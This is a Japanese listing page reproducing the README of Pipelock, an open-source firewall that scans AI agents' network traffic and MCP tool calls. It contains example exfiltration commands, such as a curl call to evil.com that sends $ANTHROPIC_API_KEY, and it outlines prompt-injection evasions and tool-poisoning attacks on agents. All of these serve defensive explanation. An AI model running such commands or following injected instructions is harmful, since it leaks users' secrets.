Pipelock
PipelockはオープンソースのAIエージェントファイアウォールで、単一のバイナリファイルによりゼロランタイム依存のセキュリティ保護を提供します。能力分離アーキテクチャを採用し、エージェントとインターネットの間に9層のスキャンパイプラインを配置して、機密情報の漏洩、プロンプトインジェクション、悪意のあるツールの呼び出しを防止します。複数のエージェントモード(Fetchエージェント、フォワードエージェント、WebSocketエージェント)とMCPエージェントをサポートし、緊急停止スイッチ、監査ログ、SIEM統合などの機能を提供します。
3ポイント
6.3K

インストール

以下のコマンドをクライアントにコピーして設定
注意:あなたのキーは機密情報です。誰とも共有しないでください。

🚀 Pipelock

AIエージェント用のオープンソースエージェントファイアウォールです。シングルバイナリで、ランタイム依存関係はありません。

エージェントの環境に $ANTHROPIC_API_KEY が設定され、シェルアクセスが可能な場合、1つのリクエストで以下のようなことが起こります。

curl "https://evil.com/steal?key=$ANTHROPIC_API_KEY"   # pipelockが監視していない限り、ゲームオーバーです

対応するツール: Claude Code · OpenAI Agents SDK · Google ADK · AutoGen · CrewAI · LangGraph · Cursor

クイックスタート · 統合ガイド · ドキュメント · ブログ

🚀 クイックスタート

# macOS / Linux
brew install luckyPipewrench/tap/pipelock

# またはバイナリをダウンロードする(依存関係なし)
# https://github.com/luckyPipewrench/pipelock/releases を参照してください

# またはDockerを使用する
docker pull ghcr.io/luckypipewrench/pipelock:latest

# またはソースからビルドする(Go 1.24+が必要)
go install github.com/luckyPipewrench/pipelock/cmd/pipelock@latest

30秒で試してみましょう:

# 1. 設定ファイルを生成する
pipelock generate config --preset balanced > pipelock.yaml

# 2. これはブロックされるはずです(DLPが偽のAPIキーを検出します)
pipelock check --config pipelock.yaml --url "https://example.com/?key=sk-ant-api03-fake1234567890"

# 3. これは許可されるはずです(クリーンなURL、シークレットなし)
pipelock check --config pipelock.yaml --url "https://docs.python.org/3/"
フォワードプロキシモード(コード変更不要、任意のHTTPクライアント)

フォワードプロキシは標準の HTTPS_PROXY トラフィックをインターセプトします。設定ファイルで有効にしてから、任意のプロセスをpipelockに向けます。

# pipelock.yamlを編集: forward_proxy.enabledをtrueに設定
pipelock run --config pipelock.yaml

export HTTPS_PROXY=http://127.0.0.1:8888
export HTTP_PROXY=http://127.0.0.1:8888

# これですべてのHTTPリクエストがpipelockのスキャナーを通過します。
curl "https://example.com/?key=sk-ant-api03-fake1234567890"  # ブロックされます

SDK、ラッパー、コード変更は不要です。エージェントがHTTPを使用する場合、pipelockはそれをスキャンします。

フェッチプロキシモード(専用のフェッチツールを持つエージェント用)
# プロキシを起動する(エージェントはlocalhost:8888/fetch?url=...に接続します)
pipelock run --config pipelock.yaml

# 完全なネットワーク分離を行う場合(エージェントはpipelockにのみ到達できます):
pipelock generate docker-compose --agent claude-code -o docker-compose.yaml
docker compose up
リリースの整合性を検証する(SLSAプロバナンス + SBOM)

すべてのリリースにはSLSAビルドプロバナンスとSBOM(CycloneDX)が含まれています。GitHub CLIで検証します。

# ダウンロードしたバイナリを検証する
gh attestation verify pipelock_*_linux_amd64.tar.gz --owner luckyPipewrench

# コンテナイメージを検証する(リリースバージョンを置き換えてください)
gh attestation verify oci://ghcr.io/luckypipewrench/pipelock:<version> --owner luckyPipewrench

✨ 主な機能

9層のURLスキャナー

すべてのリクエストは、スキーム検証、ドメインブロックリスト、DLPパターンマッチング(APIキー、トークン、資格情報用の36の組み込みパターン)、パスエントロピー分析、サブドメインエントロピー分析、DNSリバインディング防止付きのSSRF保護、ドメインごとのレート制限、URL長制限、ドメインごとのデータ予算を通過します。

DLPはDNS解決の前に実行されます。シークレットは、プロキシからDNSクエリが送信される前に検出されます。回避テストマトリックスの詳細については、docs/bypass-resistance.md を参照してください。

レスポンススキャニング

フェッチされたコンテンツは、エージェントに到達する前にプロンプトインジェクションについてスキャンされます。6パスの正規化パイプラインが、ゼロ幅文字の回避、同形文字の置換、レトスピークエンコーディング、Base64でラップされたペイロードを検出します。アクション: blockstripwarn、または ask(人間が介入するターミナル承認)。

MCPプロキシ

任意のMCPサーバーを双方向スキャニングでラップします。3つのトランスポートモード: stdioサブプロセスラッピング、Streamable HTTPブリッジング、およびHTTPリバースプロキシ。両方向をスキャンします: クライアントリクエストはDLP漏洩についてチェックされ、サーバーレスポンスはインジェクションについてスキャンされ、tools/list レスポンスは中毒された説明とセッション中の不正な変更についてチェックされます。

# ローカルのMCPサーバーをラップする(stdio)
pipelock mcp proxy --config pipelock.yaml -- npx -y @modelcontextprotocol/server-filesystem /tmp

# リモートのMCPサーバーをプロキシする(HTTP)
pipelock mcp proxy --upstream http://localhost:8080/mcp

# 結合モード(フェッチ/フォワードプロキシ + 別のポートでのMCP)
pipelock run --config pipelock.yaml --mcp-listen 0.0.0.0:8889 --mcp-upstream http://localhost:3000/mcp

MCPツールポリシー

MCPサーバーに到達する前に危険なツール呼び出しをブロックする実行前ルールです。破壊的な操作、資格情報アクセス、リバースシェル、永続化メカニズム、およびエンコードされたコマンド実行をカバーする17の組み込みルールが付属しています。シェルの難読化検出も組み込まれています。

ツール呼び出しチェーン検出

MCPツール呼び出しのシーケンスにおける攻撃パターンを検出します。偵察、資格情報盗難、データステージング、永続化、および流出チェーンをカバーする10の組み込みパターンが付属しています。ギャップ許容度を設定可能な部分列マッチングを使用するため、攻撃ステップの間に無害な呼び出しを挿入しても検出を回避できません。

緊急停止スイッチ

設定ファイル、SIGUSR1、センチネルファイル、およびリモートAPIの4つの独立したアクティベーションソースですべてのトラフィックを緊急停止できます。いずれか1つがアクティブになると、すべてのトラフィックがブロックされます。APIは別のポートで実行できるため、エージェントが自分自身の緊急停止スイッチを無効にすることはできません。

# オペレーターマシンからアクティブ化する
curl -X POST http://localhost:9090/api/v1/killswitch \
  -H "Authorization: Bearer TOKEN" -d '{"active": true}'

イベント発行

監査イベントを外部システム(SIEM、Webhookレシーバー、syslog)に転送します。イベントは即時送信され、プロキシをブロックすることはありません。各イベントには、該当する場合はMITRE ATT&CK技術ID(流出の場合はT1048、インジェクションの場合はT1059、サプライチェーンの場合はT1195.002)が含まれています。

ログスキーマ、転送パターン、およびSIEMクエリの例については、docs/guides/siem-integration.md を参照してください。

その他の機能

機能 説明
監査レポート pipelock report --input events.jsonl でHTML/JSONレポートを生成し、リスク評価、タイムライン、および証拠付録を含めます。--sign でEd25519署名を行います。(サンプルレポート)
診断 pipelock diagnose で6つのローカルチェックを実行し、設定がエンドツーエンドで機能することを確認します(ネットワーク不要)
TLSインターセプション オプションのCONNECTトンネルMITM: 復号化、ボディ/ヘッダー/レスポンスのスキャン、再暗号化。pipelock tls init でCAを生成し、pipelock tls install-ca でシステム全体で信頼するように設定します。
ブロックヒント オプトインの explain_blocks: true で、ブロックされたレスポンスに修正提案を追加します
プロジェクト監査 pipelock audit ./project でセキュリティリスクをスキャンし、カスタマイズされた設定を生成します
ファイル整合性 SHA256マニフェストで、ワークスペースファイルの変更、追加、または削除を検出します
Git保護 git diff | pipelock git scan-diff で、コミット前にシークレットを検出します
Ed25519署名 キー管理、ファイル署名、および署名検証を行い、マルチエージェントの信頼を確立します
セッションプロファイリング セッションごとの行動分析(ドメインのバースト、ボリュームの急増)
適応的強制 セッションごとの脅威スコアの蓄積とエスカレーションイベント(v1ではスコアリングとロギング)
検出抑制 設定ルールまたはインラインの pipelock:ignore コメントで既知の誤検知を無視します
マルチエージェントサポート X-Pipelock-Agent ヘッダーによるエージェント識別で、エージェントごとのフィルタリングを行います
フリート監視 Prometheusメトリクス + インポート可能な Grafanaダッシュボード

📦 インストール

スターター設定ファイルの生成

pipelock generate config --preset balanced > pipelock.yaml
pipelock audit ./my-project -o pipelock.yaml  # プロジェクトに合わせた設定
プリセット モード アクション 最適な用途
configs/balanced.yaml バランス型 警告 汎用
configs/strict.yaml 厳格型 ブロック 高セキュリティ
configs/audit.yaml 監査型 警告 ログのみの監視
configs/claude-code.yaml バランス型 ブロック Claude Code(自動運用)
configs/cursor.yaml バランス型 ブロック Cursor IDE
configs/generic-agent.yaml バランス型 警告 新しいエージェント(調整用)
configs/hostile-model.yaml 厳格型 ブロック 無制限/削除されたモデル

設定の変更は、ファイルウォッチャーまたはSIGHUPを通じて自動的に反映されます(ほとんどのフィールドは再起動せずにホットリロードされます)。

すべてのフィールド、デフォルト値、およびホットリロードの動作に関する完全なリファレンス: docs/configuration.md

💻 使用例

基本的な使用法

# macOS / Linux
brew install luckyPipewrench/tap/pipelock

# またはバイナリをダウンロードする(依存関係なし)
# https://github.com/luckyPipewrench/pipelock/releases を参照してください

# またはDockerを使用する
docker pull ghcr.io/luckypipewrench/pipelock:latest

# またはソースからビルドする(Go 1.24+が必要)
go install github.com/luckyPipewrench/pipelock/cmd/pipelock@latest

高度な使用法

# 1. 設定ファイルを生成する
pipelock generate config --preset balanced > pipelock.yaml

# 2. これはブロックされるはずです(DLPが偽のAPIキーを検出します)
pipelock check --config pipelock.yaml --url "https://example.com/?key=sk-ant-api03-fake1234567890"

# 3. これは許可されるはずです(クリーンなURL、シークレットなし)
pipelock check --config pipelock.yaml --url "https://docs.python.org/3/"

📚 詳細ドキュメント

統合ガイド

  • Claude Code: MCPプロキシの設定、.claude.json の設定
  • OpenAI Agents SDK: MCPServerStdio、マルチエージェントのハンドオフ
  • Google ADK: McpToolsetStdioConnectionParams
  • AutoGen: StdioServerParamsmcp_server_tools()
  • CrewAI: MCPServerStdio のラッピング、MCPServerAdapter
  • LangGraph: MultiServerMCPClientStateGraph
  • Cursor: Claude Code と同じMCPプロキシパターンで configs/cursor.yaml を使用します
  • OpenClaw: ゲートウェイサイドカー、初期化コンテナ、generate mcporter の設定ラッピング

CI統合

GitHubアクション

# .github/workflows/pipelock.yaml
- uses: luckyPipewrench/pipelock@v1
  with:
    scan-diff: 'true'
    fail-on-findings: 'true'

このアクションは、事前にビルドされたバイナリをダウンロードし、pipelock audit を実行してプロジェクトをスキャンし、PRの差分に漏洩したシークレットがないかチェックし、監査レポートをワークフローのアーティファクトとしてアップロードします。重大な検出結果は、PRの差分にインラインアノテーションとして表示されます。

完全なワークフローについては、 を参照してください。

再利用可能なワークフロー

# .github/workflows/security.yaml
jobs:
  pipelock:
    uses: luckyPipewrench/pipelock/.github/workflows/reusable-scan.yml@v1
    with:
      fail-on-critical: true

これがすべてのワークフローです。その他の設定はすべてデフォルト値になります: 自動生成された設定、PR差分のスキャン、アーティファクトのアップロード。

デプロイメント

# Docker
docker pull ghcr.io/luckypipewrench/pipelock:latest
docker run -p 8888:8888 -v ./pipelock.yaml:/config/pipelock.yaml:ro \
  ghcr.io/luckypipewrench/pipelock:latest \
  run --config /config/pipelock.yaml --listen 0.0.0.0:8888

# ネットワーク分離されたエージェント(Docker Compose)
pipelock generate docker-compose --agent claude-code -o docker-compose.yaml
docker compose up

本番環境でのデプロイメントレシピ(ネットワーク分離付きのDocker Compose、Kubernetesサイドカー + NetworkPolicy、iptables/nftables、macOS PF)については、docs/guides/deployment-recipes.md を参照してください。

APIリファレンス
# URLをフェッチする(抽出されたテキストコンテンツを返す)
curl "http://localhost:8888/fetch?url=https://example.com"

# フォワードプロキシ(forward_proxy.enabledがtrueの場合)
# HTTPS_PROXY=http://localhost:8888を設定し、通常通り任意のHTTPクライアントを使用します。
curl -x http://localhost:8888 https://example.com

# WebSocketプロキシ(websocket_proxy.enabledがtrueの場合)
# wscat -c "ws://localhost:8888/ws?url=ws://upstream:9090/path"

# ヘルスチェック
curl "http://localhost:8888/health"

# Prometheusメトリクス
curl "http://localhost:8888/metrics"

# JSON統計情報(上位のブロックされたドメイン、スキャナーのヒット数、トンネル数、ブロック率)
curl "http://localhost:8888/stats"

# 緊急停止スイッチAPI(api_listenが設定されている場合は、そのポートを使用します)
curl -X POST http://localhost:9090/api/v1/killswitch \
  -H "Authorization: Bearer TOKEN" -d '{"active": true}'
curl http://localhost:9090/api/v1/killswitch/status \
  -H "Authorization: Bearer TOKEN"

フェッチレスポンス:

{
  "url": "https://example.com",
  "agent": "my-bot",
  "status_code": 200,
  "content_type": "text/html",
  "title": "Example Domain",
  "content": "This domain is for use in illustrative examples...",
  "blocked": false
}

ヘルスレスポンス:

{
  "status": "healthy",
  "version": "x.y.z",
  "mode": "balanced",
  "uptime_seconds": 3600.5,
  "dlp_patterns": 36,
  "response_scan_enabled": true,
  "kill_switch_active": false
}
OWASP Agentic Top 10対応状況
脅威 対応状況
ASI01 エージェントのゴールハイジャック 強力: 双方向MCP + レスポンススキャニング
ASI02 ツールの誤用 部分的: 制御されたツールとしてのプロキシ、MCPスキャニング
ASI03 アイデンティティと特権の乱用 強力: 機能分離 + SSRF保護
ASI04 サプライチェーンの脆弱性 部分的: 整合性監視 + MCPスキャニング
ASI05 予期しないコード実行 中程度: 人間が介入する承認、フェイルセーフデフォルト
ASI06 メモリとコンテキストの汚染 中程度: フェッチされたコンテンツのインジェクション検出
ASI07 エージェント間通信の脆弱性 部分的: エージェントID、整合性、署名
ASI08 連鎖的な障害 中程度: フェイルセーフアーキテクチャ、レート制限
ASI09 人間とエージェントの信頼の悪用 部分的: 人間が介入するモード、監査ロギング
ASI10 不正なエージェント 強力: ドメイン許可リスト + レート制限 + 機能分離

詳細、設定例、およびギャップ分析については、docs/owasp-mapping.md を参照してください。

その他のドキュメント

ドキュメント 内容
設定リファレンス すべての設定フィールド、デフォルト値、ホットリロードの動作、プリセット
デプロイメントレシピ Docker Compose、K8sサイドカー + NetworkPolicy、iptables、macOS PF
回避耐性 既知の回避技術、対策、および実際の制限
ブロックされた既知の攻撃 再現コードスニペット付きの実際の攻撃と、それを阻止するpipelockの設定
ポリシー仕様v0.1 ポータブルなエージェントファイアウォールポリシー形式
SIEM統合 ログスキーマ、転送パターン、KQL/SPL/EQLクエリ
メトリクスリファレンス すべての30のPrometheusメトリクス、アラートルールテンプレート
OWASPマッピング OWASP Agentic AI Top 10に対する対応状況
比較 pipelockとagent-scan、srt、agentsh、MCP Gatewayの比較
検出抑制 ルール名、パスマッチング、インラインコメント、CI統合
OpenClawガイド ゲートウェイサイドカー、初期化コンテナ、generate mcporter のラッピング
セキュリティ保証 セキュリティモデル、信頼境界、サプライチェーン
トランスポートモード すべてのプロキシモードとそのスキャニング機能の比較
EU AI Actマッピング 条項ごとのコンプライアンスマッピング

🔧 技術詳細

仕組み

Pipelockはエージェントファイアウォールです。ウェブアプリケーション用のWAFのように、AIエージェントとインターネットの間に位置します。機能分離を使用しています: シークレットを持つエージェントプロセスはネットワーク制限され、一方でPipelock(エージェントのシークレットを持たない)は9層のスキャナーパイプラインを通じてすべてのトラフィックを検査します。デプロイメント(Dockerネットワーク分離、Kubernetes NetworkPolicyなど)によって分離境界が強制されます。

3つのプロキシモードが同じポートで動作します:

  • フェッチプロキシ (/fetch?url=...): PipelockがURLをフェッチし、テキストを抽出し、レスポンスをプロンプトインジェクションについてスキャンし、クリーンなコンテンツを返します。専用のフェッチツールを使用するエージェントに最適です。
  • フォワードプロキシ (HTTPS_PROXY): 標準のHTTP CONNECTトンネリングと絶対URI転送。エージェントはコードを変更せずにPipelockをシステムプロキシとして使用します。ホスト名スキャニングは、トンネルが開く前にブロックされたドメインとSSRFを検出します。リクエストボディとヘッダーのDLPスキャニングは、POSTボディと認証ヘッダーのシークレットを検出します。オプションのTLSインターセプションは、CONNECTトンネルを復号化して完全なボディ/ヘッダーDLPとレスポンスインジェクションスキャニングを行います(pipelock tls initpipelock tls install-ca を使用してCAを設定する必要があります)。
  • WebSocketプロキシ (/ws?url=ws://...): テキストフレームに対するDLP + インジェクション検出を含む双方向フレームスキャニング。フラグメント再組み立て、メッセージサイズ制限、アイドルタイムアウト、および接続寿命制御がすべて組み込まれています。
flowchart LR
    subgraph PRIVILEGED["Privileged Zone"]
        Agent["AI Agent\n(has API keys)"]
    end
    subgraph FETCH["Firewall Zone"]
        Proxy["Pipelock\n(no agent secrets)"]
        Scanner["Scanner Pipeline\nSSRF · Blocklist · Rate Limit\nDLP · Env Leak · Entropy · Length"]
    end
    subgraph NET["Internet"]
        Web["Web"]
    end

    Agent -- "fetch URL\nCONNECT\nor WebSocket" --> Proxy
    Proxy --> Scanner
    Scanner -- "content or\ntunnel" --> Agent
    Scanner -- "request" --> Web
    Web -- "response" --> Scanner
    Scanner -- "clean content" --> Agent

    style PRIVILEGED fill:#fee,stroke:#c33
    style FETCH fill:#efe,stroke:#3a3
    style NET fill:#eef,stroke:#33c
テキストダイアグラム(ターミナル/非Mermaidレンダラー用)
┌──────────────────────┐         ┌───────────────────────┐
│  PRIVILEGED ZONE     │         │  FIREWALL ZONE        │
│                      │         │                       │
│  AI Agent            │  IPC    │  Pipelock             │
│  - Has API keys      │────────>│  - No agent secrets   │
│  - Has credentials   │ fetch / │  - Full internet      │
│  - Restricted network│ CONNECT │  - Returns text       │
│                      │ /ws     │  - WS frame scanning  │
│                      │<────────│  - URL scanning       │
│  Can reach:          │ content │  - Audit logging      │
│  ✓ api.anthropic.com │         │                       │
│  ✓ discord.com       │         │  Can reach:           │
│  ✗ evil.com          │         │  ✓ Any URL            │
│  ✗ pastebin.com      │         │  But has:             │
└──────────────────────┘         │  ✗ No env secrets     │
                                 │  ✗ No credentials     │
                                 └───────────────────────┘

セキュリティマトリックス

Pipelockは3つのモードで動作します:

モード セキュリティ ウェブブラウジング 使用例
strict 許可リストのみ なし 規制対象の業界、高セキュリティ
balanced 単純な攻撃をブロック、高度な攻撃を検出 フェッチまたはフォワードプロキシを介して ほとんどの開発者(デフォルト)
audit ロギングのみ 制限なし 強制実施前の評価

各モードが防止、検出、またはログに記録する内容:

攻撃ベクトル 厳格モード バランスモード 監査モード
curl evil.com -d $SECRET 防止 防止 ログ記録
URLクエリパラメータのシークレット 防止 検出 (DLPスキャン) ログ記録
URL内のBase64エンコードされたシークレット 防止 検出 (エントロピースキャン) ログ記録
DNSトンネリング 防止 検出 (サブドメインエントロピー) ログ記録
チャンク化された流出 防止 検出 (レート + データ予算) ログ記録
URL内の公開鍵暗号化されたブロブ 防止 ログ記録 (エントロピーが検出) ログ記録

正直な評価: 厳格モードは、許可リストに登録されたAPIドメイン以外のすべての外部HTTPトラフィックをブロックするため、プロキシを介した流出チャネルはありません。バランスモードは、攻撃の難易度を「1つのcurlコマンド」から「高度な事前計画された攻撃」に引き上げます。監査モードは、現在持っていない可視性を提供します。Pipelockはプロセスをサンドボックス化したり、システムコールを制限したりしません。コンテンツ検査レイヤーです。完全な防御のためには、OSサンドボックスと組み合わせて使用することをお勧めします(docs/comparison.md を参照)。

プロジェクト構造

cmd/pipelock/          CLIエントリポイント
internal/
  cli/                 20以上のCobraコマンド (run, check, generate, mcp, integrity, ...)
  config/              YAML設定、検証、デフォルト値、ホットリロード (fsnotify)
  scanner/             9層のURLスキャニングパイプライン + レスポンスインジェクション検出
  audit/               構造化JSONロギング (zerolog) + イベント発行ディスパッチ
  proxy/               HTTPプロキシ: フェッチ、フォワード (CONNECT)、WebSocket、DNSピニング、TLSインターセプション
  certgen/             ECDSA P-256 CA + リーフ証明書の生成、キャッシュ
  mcp/                 MCPプロキシ + 双方向スキャニング + ツール中毒 + チェーン
  killswitch/          緊急停止 (4つのソース) + ポート分離されたAPI
  emit/                イベント発行 (Webhook + syslogシンク)
  metrics/             Prometheusメトリクス + JSON統計情報
  normalize/           Unicode正規化 (NFKC、似た文字、結合文字)
  integrity/           SHA256ファイル整合性監視
  signing/             Ed25519キー管理
  gitprotect/          Git差分スキャンによるシークレット検出
  hitl/                人間が介入するターミナル承認
  report/              JSONLイベントログからのHTML/JSON監査レポート生成
  projectscan/         監査コマンド用のプロジェクトディレクトリスキャン
enterprise/            マルチエージェント機能 (ELv2、enterprise/LICENSEを参照)
configs/               7つのプリセット設定ファイル
docs/                  ガイド、リファレンス、コンプライアンスマッピング

テスト

各リリースで更新される標準的なメトリクスです。

メトリクス
Goテスト (-race付き) 5,450以上
ステートメントカバレッジ 91%以上
テストされた回避技術 230以上
スキャナーパイプラインのオーバーヘッド URLスキャンあたり約37μs (パフォーマンス詳細)
CIマトリックス Go 1.24 + 1.25、CodeQL、golangci-lint
サプライチェーン SLSAプロバナンス、CycloneDX SBOM、cosign署名
OpenSSF Scorecard ライブスコア

make test を実行してローカルで検証します。パフォーマンスデータ: docs/performance.md。生のベンチマーク: docs/benchmarks.md。

独立したベンチマーク: agent-egress-bench (8つのカテゴリにまたがる72の攻撃ケース、ツールに依存しない)

クレジット

コントリビューションは大歓迎です。ガイドラインについては、CONTRIBUTING.md を参照してください。

Pipelockが役に立った場合は、このリポジトリをスター してください。他の人がこのプロジェクトを見つけるのに役立ちます。

📄 ライセンス

Pipelockのコアは Apache License 2.0 でライセンスされています。Copyright 2026 Joshua Waldrep。

マルチエージェント機能(エージェントごとのID、予算、および設定分離)は、enterprise ビルドタグによって制限されており、Elastic License 2.0 (ELv2) でライセンスされています。主な実装は enterprise/ ディレクトリにあり、cmd/internal/ にビルドタグで制限された統合コードがあります。これらの機能には有効なエンタープライズライセンスキーが必要です。

オープンソースコアはエンタープライズ機能なしで独立して動作します。

事前にビルドされたリリースアーティファクト(Homebrew、GitHubリリース、Dockerイメージ)には、有効なライセンスキーでアクティブ化されるエンタープライズコードが含まれています。go install またはリポジトリの Dockerfile を使用してソースからビルドすると、コミュニティ版のバイナリが生成されます。

Apache 2.0のテキストについては LICENSE を、ELv2のテキストについては enterprise/LICENSE を参照してください。

代替品

P
Paperbanana
Python
6.6K
5ポイント
B
Better Icons
20万以上のアイコンの検索と検索を提供するMCPサーバーとCLIツールで、150以上のアイコンライブラリをサポートし、AIアシスタントと開発者が迅速にアイコンを取得して使用できるように支援します。
TypeScript
6.7K
4.5ポイント
A
Assistant Ui
assistant-uiは、生産レベルのAIチャットインターフェイスを迅速に構築するためのオープンソースのTypeScript/Reactライブラリで、組み合わせ可能なUIコンポーネント、ストリーミング応答、アクセシビリティなどの機能を提供し、複数のAIバックエンドとモデルをサポートしています。
TypeScript
6.2K
5ポイント
A
Apify MCP Server
Apify MCPサーバーは、モデルコンテキストプロトコル(MCP)に基づくツールで、AIアシスタントが数千の既成のクローラー、スクレイパー、自動化ツール(Apifyアクター)を通じて、ソーシャルメディア、検索エンジン、電子商取引などのウェブサイトからデータを抽出できるようにします。OAuthとSkyfireプロキシ支払いをサポートしており、HTTPSエンドポイントまたはローカルのstdio方式でClaude、VS CodeなどのMCPクライアントに統合できます。
TypeScript
6.4K
5ポイント
R
Rsdoctor
Rsdoctorは、Rspackエコシステム向けに開発されたビルド分析ツールで、webpackと完全に互換性があり、可視化ビルド分析、多次元パフォーマンス診断、インテリジェントな最適化提案を提供し、開発者がビルド効率とエンジニアリング品質を向上させるのに役立ちます。
TypeScript
9.3K
5ポイント
N
Next Devtools MCP
Next.js開発ツールのMCPサーバーです。ClaudeやCursorなどのAIプログラミングアシスタントにNext.js開発ツールとユーティリティを提供します。実行時診断、開発自動化、およびドキュメントアクセス機能が含まれています。
TypeScript
9.7K
5ポイント
T
Testkube
Testkubeは、クラウドネイティブアプリケーション向けのテストオーケストレーションと実行フレームワークで、テストの定義、実行、分析を行うための統一プラットフォームを提供します。既存のテストツールとKubernetesインフラストラクチャをサポートします。
Go
6.5K
5ポイント
M
MCP Windbg
AIモデルをWinDbg/CDBに統合するMCPサーバーで、Windowsのクラッシュダンプファイルの分析とリモートデバッグに使用し、自然言語での対話を通じてデバッグコマンドを実行できます。
Python
10.5K
5ポイント
E
Edgeone Pages MCP Server
EdgeOne Pages MCPは、MCPプロトコルを通じてHTMLコンテンツをEdgeOne Pagesに迅速にデプロイし、公開URLを取得するサービスです。
TypeScript
23.7K
4.8ポイント
G
Gmail MCP Server
Claude Desktop用に設計されたGmail自動認証MCPサーバーで、自然言語でのやり取りによるGmailの管理をサポートし、メール送信、ラベル管理、一括操作などの完全な機能を備えています。
TypeScript
19.4K
4.5ポイント
C
Context7
Context7 MCPは、AIプログラミングアシスタントにリアルタイムのバージョン固有のドキュメントとコード例を提供するサービスで、Model Context Protocolを通じてプロンプトに直接統合され、LLMが古い情報を使用する問題を解決します。
TypeScript
78.8K
4.7ポイント
B
Baidu Map
認証済み
百度マップMCPサーバーは国内初のMCPプロトコルに対応した地図サービスで、地理コーディング、ルート計画など10個の標準化されたAPIインターフェースを提供し、PythonとTypescriptでの迅速な接続をサポートし、エージェントに地図関連の機能を実現させます。
Python
36.7K
4.5ポイント
G
Gitlab MCP Server
認証済み
GitLab MCPサーバーは、Model Context Protocolに基づくプロジェクトで、GitLabアカウントとのやり取りに必要な包括的なツールセットを提供します。コードレビュー、マージリクエスト管理、CI/CD設定などの機能が含まれます。
TypeScript
21.8K
4.3ポイント
U
Unity
認証済み
UnityMCPはUnityエディターのプラグインで、モデルコンテキストプロトコル (MCP) を実装し、UnityとAIアシスタントのシームレスな統合を提供します。リアルタイムの状態監視、リモートコマンドの実行、ログ機能が含まれます。
C#
26.7K
5ポイント
M
Magic MCP
Magic Component Platform (MCP) はAI駆動のUIコンポーネント生成ツールで、自然言語での記述を通じて、開発者が迅速に現代的なUIコンポーネントを作成するのを支援し、複数のIDEとの統合をサポートします。
JavaScript
19.4K
5ポイント
S
Sequential Thinking MCP Server
MCPプロトコルに基づく構造化思考サーバーで、思考段階を定義することで複雑な問題を分解し要約を生成するのに役立ちます。
Python
29.5K
4.5ポイント
AIBase
智啓未来、あなたの人工知能ソリューションシンクタンク
© 2026AIBase